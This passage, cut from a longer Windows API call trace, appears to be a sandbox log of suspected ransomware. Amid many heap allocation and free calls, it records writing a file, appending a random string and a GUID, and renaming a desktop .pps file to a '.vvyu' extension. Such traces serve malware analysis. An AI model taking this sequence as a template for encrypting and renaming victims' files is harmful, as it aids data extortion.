hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0193.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0193.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.058] GetCurrentThreadId () returned 0x66c [0193.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9ec30 [0193.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.058] GetCurrentThreadId () returned 0x66c [0193.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937b0 [0193.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93750 [0193.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93768 [0193.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93738 [0193.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937c8 [0193.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0193.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93798 [0193.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93780 [0193.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937e0 [0193.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0193.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93780 [0193.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0193.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0193.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93750 [0193.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea0a68 [0193.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0193.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea0c78 [0193.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0193.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0193.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0193.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea0e90 [0193.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c78 | out: hHeap=0x620000) returned 1 [0193.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e90 | out: hHeap=0x620000) returned 1 [0193.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0193.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0193.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0193.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0193.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.069] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xc26c, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xc26c, lpOverlapped=0x0) returned 1 [0193.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.070] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xc271, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.070] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.072] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.072] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.072] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.072] CloseHandle (hObject=0x568) returned 1 [0193.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0193.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea0a68 [0193.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0193.074] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\VgPttkDeNDF2VRfHy.pps" (normalized: "c:\\users\\keecfmwgj\\desktop\\vgpttkdendf2vrfhy.pps"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\VgPttkDeNDF2VRfHy.pps.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\vgpttkdendf2vrfhy.pps.vvyu")) returned 1 [0193.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.079] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0193.082] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa350b110, ftCreationTime.dwHighDateTime=0x1d898fa, ftLastAccessTime.dwLowDateTime=0x90501470, ftLastAccessTime.dwHighDateTime=0x1d8a57a, ftLastWriteTime.dwLowDateTime=0x90501470, ftLastWriteTime.dwHighDateTime=0x1d8a57a, nFileSizeHigh=0x0, nFileSizeLow=0xc271, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VgPttkDeNDF2VRfHy.pps", cAlternateFileName="VGPTTK~1.PPS")) returned 0 [0193.082] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0193.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0193.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0193.083] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0193.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0193.083] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0193.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0193.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0193.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0193.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0193.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0193.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0193.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0193.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0193.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0193.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) returned 1 [0193.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0193.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0193.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95698 | out: hHeap=0x620000) 